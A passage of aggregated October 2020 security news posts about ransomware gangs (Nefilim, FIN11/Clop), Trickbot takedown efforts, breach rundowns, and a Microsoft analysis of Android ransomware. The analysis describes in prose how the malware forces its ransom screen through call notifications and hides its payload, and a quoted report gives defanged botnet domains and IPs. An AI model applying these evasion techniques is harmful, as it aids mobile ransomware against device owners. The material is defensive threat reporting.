One of the crews that adopted this double-extortion model is the Nefilim ransomware gang that targeted several organizations including the mobile network operator Orange,  the independent European leader in multi-technical services The SPIE Group, the German largest private multi-service provider Dussman Group.

Pierluigi Paganini

(SecurityAffairs – hacking, Luxottica)

The post Nefilim ransomware gang published Luxottica data on its leak site appeared first on Security Affairs.

A Closer Look at the Attempted Ransomware Attack on Tesla

Cybersecurity is in the news again with the disclosure that Tesla, working in conjunction with the FBI, prevented a ransomware attack from being launched at its Gigafactory in Nevada. The cybercriminals targeted Tesla through one of its employees, whom they allegedly promised to pay $1 million in order to help them infect the company’s system […]… Read More

The post A Closer Look at the Attempted Ransomware Attack on Tesla appeared first on The State of Security.

FIN11 gang started deploying ransomware to monetize its operations

The financially-motivated hacker group FIN11 has started spreading ransomware to monetize its cyber criminal activities.

The financially-motivated hacker group FIN11 has switched tactics starting using ransomware as the main monetization method.

The group carried out multiple high-volume operations targeting companies across the world, most of them in North America and Europe.

In recent attacks, the group was observed deploying the Clop ransomware into the networks of its victims.

Since August, FIN11 started targeting organizations in many industries, including defense, energy, finance, healthcare, legal, pharmaceutical, telecommunications, technology, and transportation.

Researchers from FireEye’s Mandiant observed FIN11 hackers using spear-phishing messages distributing a malware downloader dubbed FRIENDSPEAK.

“Recently, FIN11 has deployed CLOP ransomware and threatened to publish exfiltrated data to pressure victims into paying ransom demands.” reads the analysis published by FireEye. “The group’s shifting monetization methods—from point-of-sale (POS) malware in 2018, to ransomware in 2019, and hybrid extortion in 2020—is part of a larger trend in which criminal actors have increasingly focused on post-compromise ransomware deployment and data theft extortion.”

The attack chain starts when the victims enable the macro embedded in an Excel spreadsheet that came with the phishing e-mails.

The macros download and execute the FRIENDSPEAK code, which in turn downloads the MIXLABEL malware.

Experts also reported that the threat actor modified the macros in Office documents used as bait and also added geofencing techniques.

Mandiant researchers highlighted an important with operations conducted by the TA505 cybercrime gang (aka Evil Corp), which has been active since 2014 focusing on retail and banking sectors.

TA505 also deployed the Clop ransomware in its malware campaigns and recently started exploiting the ZeroLogon critical flaw to compromise targeted organizations.

“Attribution of both historic TA505 activity and more recent FIN11 activity is complicated by the actors’ use of criminal service providers. Like most financially motivated actors, FIN11 doesn’t operate in a vacuum. We believe that the group has used services that provide anonymous domain registration, bulletproof hosting, code signing certificates, and private or semi-private malware.” reads the analysis. “Outsourcing work to these criminal service providers likely enables FIN11 to increase the scale and sophistication of their operations.”

fin11 services3

The experts pointed out that the FIN11 actors after dropped the Clop ransomware did not abandon the target after losing access, at least in one case they re-compromised the target organization a few months later.

The researchers believe FIN11 operates from the Commonwealth of Independent States (CIS – former Soviet Union countries).

The experts observed Russian-language file metadata in the code of the malware and reported that the Clop ransomware was only deployed on machines with a keyboard layout used outside CIS countries.

Mandiant researchers speculate FIN11 will continue to target organizations with sensitive proprietary data and that will likely pay the ransom to recover their operations after the attacks.

Pierluigi Paganini

(SecurityAffairs – hacking, FIN11)

The post FIN11 gang started deploying ransomware to monetize its operations appeared first on Security Affairs.

Barnes & Noble warns customers it has been hacked, customer data may have been accessed

American bookselling giant Barnes & Noble is contacting customers via email, warning them that its network was breached by hackers, and that sensitive information about shoppers may have been accessed. In the email to customers, Barnes & Noble says that it became aware that it had fallen victim to a cybersecurity attack on Saturday October […]… Read More

The post Barnes & Noble warns customers it has been hacked, customer data may have been accessed appeared first on The State of Security.

FIN11: Widespread Email Campaigns as Precursor for Ransomware and Data Theft

Mandiant Threat Intelligence recently promoted a threat cluster to a named FIN (or financially motivated) threat group for the first time since 2017. We have detailed FIN11's various tactics, techniques and procedures in a report that is available now by signing up for Mandiant Advantage Free.

In some ways, FIN11 is reminiscent of APT1; they are notable not for their sophistication, but for their sheer volume of activity. There are significant gaps in FIN11’s phishing operations, but when active, the group conducts up to five high-volume campaigns a week. While many financially motivated threat groups are short lived, FIN11 has been conducting these widespread phishing campaigns since at least 2016. From 2017 through 2018, the threat group primarily targeted organizations in the financial, retail, and hospitality sectors. However, in 2019 FIN11’s targeting expanded to include a diverse set of sectors and geographic regions. At this point, it would be difficult to name a client that FIN11 hasn’t targeted.

Mandiant has also responded to numerous FIN11 intrusions, but we’ve only observed the group successfully monetize access in few instances. This could suggest that the actors cast a wide net during their phishing operations, then choose which victims to further exploit based on characteristics such as sector, geolocation or perceived security posture. Recently, FIN11 has deployed CLOP ransomware and threatened to publish exfiltrated data to pressure victims into paying ransom demands. The group’s shifting monetization methods—from point-of-sale (POS) malware in 2018, to ransomware in 2019, and hybrid extortion in 2020—is part of a larger trend in which criminal actors have increasingly focused on post-compromise ransomware deployment and data theft extortion.

Notably, FIN11 includes a subset of the activity security researchers call TA505, but we do not attribute TA505’s early operations to FIN11 and caution against using the names interchangeably. Attribution of both historic TA505 activity and more recent FIN11 activity is complicated by the actors’ use of criminal service providers. Like most financially motivated actors, FIN11 doesn’t operate in a vacuum. We believe that the group has used services that provide anonymous domain registration, bulletproof hosting, code signing certificates, and private or semi-private malware. Outsourcing work to these criminal service providers likely enables FIN11 to increase the scale and sophistication of their operations.

To learn more about FIN11’s evolving delivery tactics, use of services, post-compromise TTPs, and monetization methods, register for Mandiant Advantage Free. The full FIN11 report is also available through our FireEye Intelligence Portal (FIP). Then for even more information, register for our exclusive webinar on Oct. 29 where Mandiant threat intelligence experts will take a deeper dive into FIN11, including its origins, tactics, and potential for future activity. 

Microsoft Uses Trademark Law to Disrupt Trickbot Botnet

Microsoft Corp. has executed a coordinated legal sneak attack in a bid to disrupt the malware-as-a-service botnet Trickbot, a global menace that has infected millions of computers and is used to spread ransomware. A court in Virginia granted Microsoft control over many Internet servers Trickbot uses to plunder infected systems, based on novel claims that the crime machine abused the software giant’s trademarks. However, it appears the operation has not completely disabled the botnet.

A spam email containing a Trickbot-infected attachment that was sent earlier this year. Image: Microsoft.

“We disrupted Trickbot through a court order we obtained as well as technical action we executed in partnership with telecommunications providers around the world,” wrote Tom Burt, corporate vice president of customer security and trust at Microsoft, in a blog post this morning about the legal maneuver. “We have now cut off key infrastructure so those operating Trickbot will no longer be able to initiate new infections or activate ransomware already dropped into computer systems.”

Microsoft’s action comes just days after the U.S. military’s Cyber Command carried out its own attack that sent all infected Trickbot systems a command telling them to disconnect themselves from the Internet servers the Trickbot overlords used to control them. The roughly 10-day operation by Cyber Command also stuffed millions of bogus records about new victims into the Trickbot database in a bid to confuse the botnet’s operators.

In legal filings, Microsoft argued that Trickbot irreparably harms the company “by damaging its reputation, brands, and customer goodwill. Defendants physically alter and corrupt Microsoft products such as the Microsoft Windows products. Once infected, altered and controlled by Trickbot, the Windows operating system ceases to operate normally and becomes tools for Defendants to conduct their theft.”

From the civil complaint Microsoft filed on October 6 with the U.S. District Court for the Eastern District of Virginia:

“However, they still bear the Microsoft and Windows trademarks. This is obviously meant to and does mislead Microsoft’s customers, and it causes extreme damage to Microsoft’s brands and trademarks.”

“Users subject to the negative effects of these malicious applications incorrectly believe that Microsoft and Windows are the source of their computing device problems. There is great risk that users may attribute this problem to Microsoft and associate these problems with Microsoft’s Windows products, thereby diluting and tarnishing the value of the Microsoft and Windows trademarks and brands.”

Microsoft said it will leverage the seized Trickbot servers to identify and assist Windows users impacted by the Trickbot malware in cleaning the malware off of their systems.

Trickbot has been used to steal passwords from millions of infected computers, and reportedly to hijack access to well more than 250 million email accounts from which new copies of the malware are sent to the victim’s contacts.

Trickbot’s malware-as-a-service feature has made it a reliable vehicle for deploying various strains of ransomware, locking up infected systems on a corporate network unless and until the company agrees to make an extortion payment.

A particularly destructive ransomware strain that is closely associated with Trickbot — known as “Ryuk” or “Conti” — has been responsible for costly attacks on countless organizations over the past year, including healthcare providers, medical research centers and hospitals.

One recent Ryuk victim is Universal Health Services (UHS), a Fortune 500 hospital and healthcare services provider that operates more than 400 facilities in the U.S. and U.K.

On Sunday, Sept. 27, UHS shut down its computer systems at healthcare facilities across the United States in a bid to stop the spread of the malware. The disruption caused some of the affected hospitals to redirect ambulances and relocate patients in need of surgery to other nearby hospitals.

Microsoft said it did not expect its action to permanently disrupt Trickbot, noting that the crooks behind the botnet will likely make efforts to revive their operations. But so far it’s not clear whether Microsoft succeeded in commandeering all of Trickbot’s control servers, or when exactly the coordinated seizure of those servers occurred.

As the company noted in its legal filings, the set of Internet address used as Trickbot controllers is dynamic, making attempts to disable the botnet more challenging.

Indeed, according to real-time information posted by Feodo Tracker, a Swiss security site that tracks Internet servers used as controllers for Trickbot and other botnets, nearly two dozen Trickbot control servers — some of which first went active at beginning of this month — are still live and responding to requests at the time of this publication.

Trickbot control servers that are currently online. Source: Feodotracker.abuse.ch

Cyber intelligence firm Intel 471 says fully taking down Trickbot would require an unprecedented level of collaboration among parties and countries that most likely would not cooperate anyway. That’s partly because Trickbot’s primary command and control mechanism supports communication over The Onion Router (TOR) — a distributed anonymity service that is wholly separate from the regular Internet.

“As a result, it is highly likely a takedown of the Trickbot infrastructure would have little medium- to long-term impact on the operation of Trickbot,” Intel 471 wrote in an analysis of Microsoft’s action.

What’s more, Trickbot has a fallback communications method that uses a decentralized domain name system called EmerDNS, which allows people to create and use domains that cannot be altered, revoked or suspended by any authority. The highly popular cybercrime store Joker’s Stash — which sells millions of stolen credit cards — also uses this setup.

From the Intel 471 report [malicious links and IP address defanged with brackets]:

“In the event all Trickbot infrastructure is taken down, the cybercriminals behind Trickbot will need to rebuild their servers and change their EmerDNS domain to point at their new servers. Compromised systems then should be able to connect to the new Trickbot infrastructure. Trickbot’s EmerDNS fall-back domain safetrust[.]bazar recently resolved to the IP address 195.123.237[.]156. Not coincidentally, this network neighborhood also hosts Bazar malware control servers.”

“Researchers previously attributed the development of the Bazar malware family to the same group behind Trickbot, due to code similarities with the Anchor malware family and its methods of operation, such as shared infrastructure between Anchor and Bazar. On Oct. 12, 2020 the fall-back domain resolved to the IP address 23.92.93[.]233, which was confirmed by Intel 471 Malware Intelligence systems to be a Trickbot controller URL in May 2019. This suggests the fall-back domain is still controlled by the Trickbot operators at the time of this report.”

Intel 471 concluded that the Microsoft action has so far has done little to disrupt the botnet’s activity.

“At the time of this report, Intel 471 has not seen any significant impact on Trickbot’s infrastructure and ability to communicate with Trickbot-infected systems,” the company wrote.

The legal filings from Microsoft are available here.

Update, 9:51 a.m. ET: Feodo Tracker now lists just six Trickbot controllers as responding. All six were first seen online in the past 48 hours. Also added perspective from Intel 471.

Report: U.S. Cyber Command Behind Trickbot Tricks

A week ago, KrebsOnSecurity broke the news that someone was attempting to disrupt the Trickbot botnet, a malware crime machine that has infected millions of computers and is often used to spread ransomware. A new report Friday says the coordinated attack was part of an operation carried out by the U.S. military’s Cyber Command.

Image: Shutterstock.

On October 2, KrebsOnSecurity reported that twice in the preceding ten days, an unknown entity that had inside access to the Trickbot botnet sent all infected systems a command telling them to disconnect themselves from the Internet servers the Trickbot overlords used to control compromised Microsoft Windows computers.

On top of that, someone had stuffed millions of bogus records about new victims into the Trickbot database — apparently to confuse or stymie the botnet’s operators.

In a story published Oct. 9, The Washington Post reported that four U.S. officials who spoke on condition of anonymity said the Trickbot disruption was the work of U.S. Cyber Command, a branch of the Department of Defense headed by the director of the National Security Agency (NSA).

The Post report suggested the action was a bid to prevent Trickbot from being used to somehow interfere with the upcoming presidential election, noting that Cyber Command was instrumental in disrupting the Internet access of Russian online troll farms during the 2018 midterm elections.

The Post said U.S. officials recognized their operation would not permanently dismantle Trickbot, describing it rather as “one way to distract them for at least a while as they seek to restore their operations.”

Alex Holden, chief information security officer and president of Milwaukee-based Hold Security, has been monitoring Trickbot activity before and after the 10-day operation. Holden said while the attack on Trickbot appears to have cut its operators off from a large number of victim computers, the bad guys still have passwords, financial data and reams of other sensitive information stolen from more than 2.7 million systems around the world.

Holden said the Trickbot operators have begun rebuilding their botnet, and continue to engage in deploying ransomware at new targets.

“They are running normally and their ransomware operations are pretty much back in full swing,” Holden said. “They are not slowing down because they still have a great deal of stolen data.”

Holden added that since news of the disruption first broke a week ago, the Russian-speaking cybercriminals behind Trickbot have been discussing how to recoup their losses, and have been toying with the idea of massively increasing the amount of money demanded from future ransomware victims.

“There is a conversation happening in the back channels,” Holden said. “Normally, they will ask for [a ransom amount] that is something like 10 percent of the victim company’s annual revenues. Now, some of the guys involved are talking about increasing that to 100 percent or 150 percent.”

Cyber News Rundown: COVID-related Attacks Target Canadian Companies

Reading Time: ~ 2 min.

New Jersey Hospital Pays Massive Ransom

Officials have decided to pay roughly $670,000 in ransom following a ransomware attack on the University Hospital in New Jersey. The hospital was likely forced into this decision after being unable to restore from backups the 240GB of data stolen in the attack on their systems. It’s not entirely clear what information was stolen, but given the haste of payment it was likely highly sensitive patient data.

COVID-Related Cyberattacks Target Canadian Companies

A recent survey revealed that over 25% of all Canadian business organizations had been targeted by a COVID-19-themed cyberattack since the beginning of the year. Most of the organizations surveyed also reported seeing a significant rise in overall cyberattacks since the pandemic began. Worrisome findings also revealed that 38% of organizations surveyed were unsure if they had fallen victim to any type of cyberattack, which could mean the amount of customer information for sale on black markets could be significantly higher.

Boom! Mobile Website Compromised

Customer data has been compromised for users of the Boom! Mobile website, which was infiltrated by malicious JavaScript. It’s still unclear how the unauthorized code got onto the site or how long was active. Officials for the mobile company have confirmed they do not store payment card data and that no Boom! Mobile accounts were compromised.

Major Ransomware Attacks Increase Through Q3

Researchers have reported a massive increase in ransomware attacks in Q3 of 2020, with the Maze group being responsible for 12% of all attacks. They also reported that Ryuk ransomware variants were responsible for an average of 20 attacks per week. With the ongoing neglect of cybersecurity in major corporations, ransomware attacks will likely continue as long as their authors find them profitable.

Chicago Food Delivery Service Stricken with Data Breach

Nearly 800,000 customer records were compromised following a data breach at ChowBus, a Chicago-based food delivery service. With roughly 440,000 unique email addresses exposed, many individuals are now more susceptible to additional phishing attacks or identity theft. Fortunately, however, ChowBus does not store payment card information on its site.

The post Cyber News Rundown: COVID-related Attacks Target Canadian Companies appeared first on Webroot Blog.

Android Locker Variant Uses Innovative Sequence to Load Ransom Note

A new variant of a sophisticated Android locker family used an innovative sequence to load its ransom note on infected devices. On October 8, Microsoft Defender Research Team revealed that it had spotted a new Android locker variant using novel techniques to display its ransom note to its victims. This threat specifically targeted two components […]… Read More

The post Android Locker Variant Uses Innovative Sequence to Load Ransom Note appeared first on The State of Security.

Sophisticated new Android malware marks the latest evolution of mobile ransomware

Attackers are persistent and motivated to continuously evolve – and no platform is immune. That is why Microsoft has been working to extend its industry-leading endpoint protection capabilities beyond Windows. The addition of mobile threat defense into these capabilities means that Microsoft Defender for Endpoint (previously Microsoft Defender Advanced Threat Protection) now delivers protection on all major platforms.

Microsoft’s mobile threat defense capabilities further enrich the visibility that organizations have on threats in their networks, as well as provide more tools to detect and respond to threats across domains and across platforms. Like all of Microsoft’s security solutions, these new capabilities are likewise backed by a global network of threat researchers and security experts whose deep understanding of the threat landscape guide the continuous innovation of security features and ensure that customers are protected from ever-evolving threats.

For example, we found a piece of a particularly sophisticated Android ransomware with novel techniques and behavior, exemplifying the rapid evolution of mobile threats that we have also observed on other platforms. The mobile ransomware, detected by Microsoft Defender for Endpoint as AndroidOS/MalLocker.B, is the latest variant of a ransomware family that’s been in the wild for a while but has been evolving non-stop. This ransomware family is known for being hosted on arbitrary websites and circulated on online forums using various social engineering lures, including masquerading as popular apps, cracked games, or video players. The new variant caught our attention because it’s an advanced malware with unmistakable malicious characteristic and behavior and yet manages to evade many available protections, registering a low detection rate against security solutions.

As with most Android ransomware, this new threat doesn’t actually block access to files by encrypting them. Instead, it blocks access to devices by displaying a screen that appears over every other window, such that the user can’t do anything else. The said screen is the ransom note, which contains threats and instructions to pay the ransom.

Screenshot of mobile ransom note in Russian language

Figure 1. Sample ransom note used by older ransomware variants

What’s innovative about this ransomware is how it displays its ransom note. In this blog, we’ll detail the innovative ways in which this ransomware surfaces its ransom note using Android features we haven’t seen leveraged by malware before, as well as incorporating an open-source machine learning module designed for context-aware cropping of its ransom note.

New scheme, same goal

In the past, Android ransomware used a special permission called “SYSTEM_ALERT_WINDOW” to display their ransom note. Apps that have this permission can draw a window that belongs to the system group and can’t be dismissed. No matter what button is pressed, the window stays on top of all other windows. The notification was intended to be used for system alerts or errors, but Android threats misused it to force the attacker-controlled UI to fully occupy the screen, blocking access to the device. Attackers create this scenario to persuade users to pay the ransom so they can gain back access to the device.

To catch these threats, security solutions used heuristics that focused on detecting this behavior. Google later implemented platform-level changes that practically eliminated this attack surface. These changes include:

  1. Removing the SYSTEM_ALERT_WINDOW error and alert window types, and introducing a few other types as replacement
  2. Elevating the permission status of SYSTEM_ALERT_WINDOW to special permission by putting it into the “above dangerous” category, which means that users have to go through many screens to approve apps that ask for permission, instead of just one click
  3. Introducing an overlay kill switch on Android 8.0 and later that users can activate anytime to deactivate a system alert window

To adapt, Android malware evolved to misusing other features, but these aren’t as effective. For example, some strains of ransomware abuse accessibility features, a method that could easily alarm users because accessibility is a special permission that requires users to go through several screens and accept a warning that the app will be able to monitor activity via accessibility services. Other ransomware families use infinite loops of drawing non-system windows, but in between drawing and redrawing, it’s possible for users to go to settings and uninstall the offending app.

The new Android ransomware variant overcomes these barriers by evolving further than any Android malware we’ve seen before. To surface its ransom note, it uses a series of techniques that take advantage of the following components on Android:

  1. The “call” notification, among several categories of notifications that Android supports, which requires immediate user attention.
  2. The “onUserLeaveHint()” callback method of the Android Activity (i.e., the typical GUI screen the user sees) is called as part of the activity lifecycle when the activity is about to go into the background as a result of user choice, for example, when the user presses the Home key.

The malware connects the dots and uses these two components to create a special type of notification that triggers the ransom screen via the callback.

Screenshot of malware code

Figure 2. The notification with full intent and set as “call’ category

As the code snippet shows, the malware creates a notification builder and then does the following:

  1. setCategory(“call”) – This means that the notification is built as a very important notification that needs special privilege.
  2. setFullScreenIntent() – This API wires the notification to a GUI so that it pops up when the user taps on it. At this stage, half the job is done for the malware. However, the malware wouldn’t want to depend on user interaction to trigger the ransomware screen, so, it adds another functionality of Android callback:

Figure 3. The malware overriding onUserLeaveHint

As the code snippet shows, the malware overrides the onUserLeaveHint() callback function of Activity class. The function onUserLeaveHint() is called whenever the malware screen is pushed to background, causing the in-call Activity to be automatically brought to the foreground. Recall that the malware hooked the RansomActivity intent with the notification that was created as a “call” type notification. This creates a chain of events that triggers the automatic pop-up of the ransomware screen without doing infinite redraw or posing as system window.

Machine learning module indicates continuous evolution

As mentioned, this ransomware is the latest variant of a malware family that has undergone several stages of evolution. The knowledge graph below shows the various techniques this ransomware family has been seen using, including abusing the system alert window, abusing accessibility features, and, more recently, abusing notification services.

Knowledge graph showing techniques used by the Android rasomware family

Figure 4. Knowledge graph of techniques used by ransomware family

This ransomware family’s long history tells us that its evolution is far from over. We expect it to churn out new variants with even more sophisticated techniques. In fact, recent variants contain code forked from an open-source machine learning module used by developers to automatically resize and crop images based on screen size, a valuable function given the variety of Android devices.

The frozen TinyML model is useful for making sure images fit the screen without distortion. In the case of this ransomware, using the model would ensure that its ransom note—typically fake police notice or explicit images supposedly found on the device—would appear less contrived and more believable, increasing the chances of the user paying for the ransom.

The library that uses tinyML is not yet wired to the malware’s functionalities, but its presence in the malware code indicates the intention to do so in future variants. We will continue to monitor this ransomware family to ensure customers are protected and to share our findings and insights to the community for broad protection against these evolving mobile threats.

Protecting organizations from threats across domains and platforms

Mobile threats continue to rapidly evolve, with attackers continuously attempting to sidestep technological barriers and creatively find ways to accomplish their goal, whether financial gain or finding an entry point to broader network compromise.

This new mobile ransomware variant is an important discovery because the malware exhibits behaviors that have not been seen before and could open doors for other malware to follow. It reinforces the need for comprehensive defense powered by broad visibility into attack surfaces as well as domain experts who track the threat landscape and uncover notable threats that might be hiding amidst massive threat data and signals.

Microsoft Defender for Endpoint on Android, now generally available, extends Microsoft’s industry-leading endpoint protection to Android. It detects this ransomware (AndroidOS/MalLocker.B), as well as other malicious apps and files using cloud-based protection powered by deep learning and heuristics, in addition to content-based detection. It also protects users and organizations from other mobile threats, such as mobile phishing, unsafe network connections, and unauthorized access to sensitive data. Learn more about our mobile threat defense capabilities in Microsoft Defender for Endpoint on Android.

Malware, phishing, and other threats detected by Microsoft Defender for Endpoint are reported to the Microsoft Defender Security Center, allowing SecOps to investigate mobile threats along with endpoint signals from Windows and other platforms using Microsoft Defender for Endpoint’s rich set of tools for detection, investigation, and response.

Threat data from endpoints are combined with signals from email and data, identities, and apps in Microsoft 365 Defender (previously Microsoft Threat Protection), which orchestrates detection, prevention, investigation, and response across domains, providing coordinated defense. Microsoft Defender for Endpoint on Android further enriches organizations’ visibility into malicious activity, empowering them to comprehensively prevent, detect, and respond to against attack sprawl and cross-domain incidents.

Technical analysis

Obfuscation

On top of recreating ransomware behavior in ways we haven’t seen before, the Android malware variant uses a new obfuscation technique unique to the Android platform. One of the tell-tale signs of an obfuscated malware is the absence of code that defines the classes declared in the manifest file.

Malware code showing manifest file

Figure 5. Manifest file

The classes.dex has implementation for only two classes:

  1. The main application class gCHotRrgEruDv, which is involved when the application opens
  2. A helper class that has definition for custom encryption and decryption

This means that there’s no code corresponding to the services declared in the manifest file: Main Activity, Broadcast Receivers, and Background. How does the malware work without code for these key components? As is characteristic for obfuscated threats, the malware has encrypted binary code stored in the Assets folder:

Screenshot of Assets folder with encrypted executable code

Figure 6. Encrypted executable code in Assets folder

When the malware runs for the first time, the static block of the main class is run. The code is heavily obfuscated and made unreadable through name mangling and use of meaningless variable names:

Figure 7. Static block

Decryption with a twist

The malware uses an interesting decryption routine: the string values passed to the decryption function do not correspond to the decrypted value, they correspond to junk code to simply hinder analysis.

On Android, an Intent is a software mechanism that allows users to coordinate the functions of different Activities to achieve a task. It’s a messaging object that can be used to request an action from another app component.

The Intent object carries a string value as “action” parameter. The malware creates an Intent inside the decryption function using the string value passed as the name for the Intent. It then decrypts a hardcoded encrypted value and sets the “action” parameter of the Intent using the setAction API. Once this Intent object is generated with the action value pointing to the decrypted content, the decryption function returns the Intent object to the callee. The callee then invokes the getAction method to get the decrypted content.

Figure 8. Decryption function using the Intent object to pass the decrypted value

Payload deployment

Once the static block execution is complete, the Android Lifecycle callback transfers the control to the OnCreate method of the main class.

Malware code showing onCreate method

Figure 9. onCreate method of the main class decrypting the payload

Next, the malware-defined function decryptAssetToDex (a meaningful name we assigned during analysis) receives the string “CuffGmrQRT” as the first argument, which is the name of the encrypted file stored in the Assets folder.

Malware code showing decryption of assets

Figure 10. Decrypting the assets

After being decrypted, the asset turns into the .dex file. This is a notable behavior that is characteristic of this ransomware family.

Comparison of code of Asset file before and after decryption

Figure 11. Asset file before and after decryption

Once the encrypted executable is decrypted and dropped in the storage, the malware has the definitions for all the components it declared in the manifest file. It then starts the final detonator function to load the dropped .dex file into memory and triggers the main payload.

Malware code showing loading of decrypted dex file

Figure 12. Loading the decrypted .dex file into memory and triggering the main payload

Main payload

When the main payload is loaded into memory, the initial detonator hands over the control to the main payload by invoking the method XoqF (which we renamed to triggerInfection during analysis) from the gvmthHtyN class (renamed to PayloadEntry).

Malware code showing handover from initial module to main payload

Figure 13. Handover from initial module to the main payload

As mentioned, the initial handover component called triggerInfection with an instance of appObj and a method that returns the value for the variable config.

Malware code showing definition of populateConfigMap

Figure 14. Definition of populateConfigMap, which loads the map with values

Correlating the last two steps, one can observe that the malware payload receives the configuration for the following properties:

  1. number – The default number to be send to the server (in case the number is not available from the device)
  2. api – The API key
  3. url – The URL to be used in WebView to display on the ransom note

The malware saves this configuration to the shared preferences of the app data and then it sets up all the Broadcast Receivers. This action registers code components to get notified when certain system events happen. This is done in the function initComponents.

Malware code showing initializing broadcast receiver

Figure 15. Initializing the BroadcastReceiver against system events

From this point on, the malware execution is driven by callback functions that are triggered on system events like connectivity change, unlocking the phone, elapsed time interval, and others.

 

Dinesh Venkatesan

Microsoft Defender Research

 

The post Sophisticated new Android malware marks the latest evolution of mobile ransomware appeared first on Microsoft Security.

30 Ransomware Prevention Tips

Dealing with the aftermath of ransomware attacks is like Russian roulette. Submitting the ransom might seem like it’s the sole option for recovering locked data. But paying the ransom doesn’t mean that your organization will get its affected data back. Let’s not forget that ransomware also continues to evolve as a threat category. Beginning in […]… Read More

The post 30 Ransomware Prevention Tips appeared first on The State of Security.

Attacks Aimed at Disrupting the Trickbot Botnet

Over the past 10 days, someone has been launching a series of coordinated attacks designed to disrupt Trickbot, an enormous collection of more than two million malware-infected Windows PCs that are constantly being harvested for financial data and are often used as the entry point for deploying ransomware within compromised organizations.

A text snippet from one of the bogus Trickbot configuration updates. Source: Intel 471

On Sept. 22, someone pushed out a new configuration file to Windows computers currently infected with Trickbot. The crooks running the Trickbot botnet typically use these config files to pass new instructions to their fleet of infected PCs, such as the Internet address where hacked systems should download new updates to the malware.

But the new configuration file pushed on Sept. 22 told all systems infected with Trickbot that their new malware control server had the address 127.0.0.1, which is a “localhost” address that is not reachable over the public Internet, according to an analysis by cyber intelligence firm Intel 471.

It’s not known how many Trickbot-infected systems received the phony update, but it seems clear this wasn’t just a mistake by Trickbot’s overlords. Intel 471 found that it happened yet again on Oct. 1, suggesting someone with access to the inner workings of the botnet was trying to disrupt its operations.

“Shortly after the bogus configs were pushed out, all Trickbot controllers stopped responding correctly to bot requests,” Intel 471 wrote in a note to its customers. “This possibly means central Trickbot controller infrastructure was disrupted. The close timing of both events suggested an intentional disruption of Trickbot botnet operations.”

Intel 471 CEO Mark Arena said it’s anyone’s guess at this point who is responsible.

“Obviously, someone is trying to attack Trickbot,” Arena said. “It could be someone in the security research community, a government, a disgruntled insider, or a rival cybercrime group. We just don’t know at this point.

Arena said it’s unclear how successful these bogus configuration file updates will be given that the Trickbot authors built a fail-safe recovery system into their malware. Specifically, Trickbot has a backup control mechanism: A domain name registered on EmerDNS, a decentralized domain name system.

“This domain should still be in control of the Trickbot operators and could potentially be used to recover bots,” Intel 471 wrote.

But whoever is screwing with the Trickbot purveyors appears to have adopted a multi-pronged approach: Around the same time as the second bogus configuration file update was pushed on Oct. 1, someone stuffed the control networks that the Trickbot operators use to keep track of data on infected systems with millions of new records.

Alex Holden is chief technology officer and founder of Hold Security, a Milwaukee-based cyber intelligence firm that helps recover stolen data. Holden said at the end of September Trickbot held passwords and financial data stolen from more than 2.7 million Windows PCs.

By October 1, Holden said, that number had magically grown to more than seven million.

“Someone is flooding the Trickbot system with fake data,” Holden said. “Whoever is doing this is generating records that include machine names indicating these are infected systems in a broad range of organizations, including the Department of Defense, U.S. Bank, JP Morgan Chase, PNC and Citigroup, to name a few.”

Holden said the flood of new, apparently bogus, records appears to be an attempt by someone to dilute the Trickbot database and confuse or stymie the Trickbot operators. But so far, Holden said, the impact has been mainly to annoy and aggravate the criminals in charge of Trickbot.

“Our monitoring found at least one statement from one of the ransomware groups that relies on Trickbot saying this pisses them off, and they’re going to double the ransom they’re asking for from a victim,” Holden said. “We haven’t been able to confirm whether they actually followed through with that, but these attacks are definitely interfering with their business.”

Intel 471’s Arena said this could be part of an ongoing campaign to dismantle or wrest control over the Trickbot botnet. Such an effort would hardly be unprecedented. In 2014, for example, U.S. and international law enforcement agencies teamed up with multiple security firms and private researchers to commandeer the Gameover Zeus Botnet, a particularly aggressive and sophisticated malware strain that had enslaved up to 1 million Windows PCs globally.

Trickbot would be an attractive target for such a takeover effort because it is widely viewed as a platform used to find potential ransomware victims. Intel 471 describes Trickbot as “a malware-as-a-service platform that caters to a relatively small number of top-tier cybercriminals.”

One of the top ransomware gangs in operation today — which deploys ransomware strains known variously as “Ryuk” and “Conti,” is known to be closely associated with Trickbot infections. Both ransomware families have been used in some of the most damaging and costly malware incidents to date.

The latest Ryuk victim is Universal Health Services (UHS), a Fortune 500 hospital and healthcare services provider that operates more than 400 facilities in the U.S. and U.K.

On Sunday, Sept. 27, UHS shut down its computer systems at healthcare facilities across the United States in a bid to stop the spread of the malware. The disruption has reportedly caused the affected hospitals to redirect ambulances and relocate patients in need of surgery to other nearby hospitals.

Cyber News Rundown: Ryuk Wreaks Healthcare Havoc

Reading Time: ~ 2 min.

Ryuk Shuts Down Universal Health Services

Computer systems for all 400 Universal Health Services facilities around the globe have reportedly been shut down following an attack by the Ryuk ransomware group. Ryuk is known for targeting large organizations, but the healthcare industry has been gaining popularity among these groups due to high volumes of sensitive information and typically low levels of security. It’s unknown if the healthcare firm has paid ransoms for the encrypted data or if they are restoring systems from available backups.

Global Insurance Firm Targeted by Ransomware

The Fortune 500 insurance firm AJG was forced to take several computer systems offline over the weekend after identifying a cyber-attack. It’s still unclear which ransomware variant was responsible for the attack and officials with the firm haven’t revealed if customer or employee information was stolen. Third-party researchers confirmed multiple AJG servers, unpatched for a serious vulnerability, could have been the entry point for the attack.

French Shipping Company Knocked Offline by Ransomware

All computer systems and websites belonging to CMA CGM, a French shipping giant, were knocked offline by a crippling ransomware attack. This attack on CMA CGM makes them the fourth international shipping company to fall victim to a cyberattack, which have proven profitable, in as many years. The company has verified that the Ragnar Locker ransomware group was behind the attack, though they have not revealed the ransom asked.

Cyber Attack Forces Swatch to Disconnect Online Services

Though not confirmed by Swatch, the Swiss watchmaker was reportedly forced to take many of their systems offline after likely falling victim to a ransomware attack. While the company did not verify the type of attack, ransomware’s prevalence this year makes it a likely culprit. Swatch has announced they plan to seek legal action against the attackers.

DDoS Attacks See Substantial Rise in 2020

There were over 4.8 million DDoS attacks during the first half of 2020, a 15% rise over the same period last year. May alone saw more than 900,000 DDoS attacks, a record for most in a single month. Ninety percent of these attacks lasted for under an hour, marking another shift from previous years’ attacks. They have also increased in complexity, leaving victims and researchers with little time to defend themselves.

The post Cyber News Rundown: Ryuk Wreaks Healthcare Havoc appeared first on Webroot Blog.

Cyber Security Roundup for October 2020

A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, October 2020.

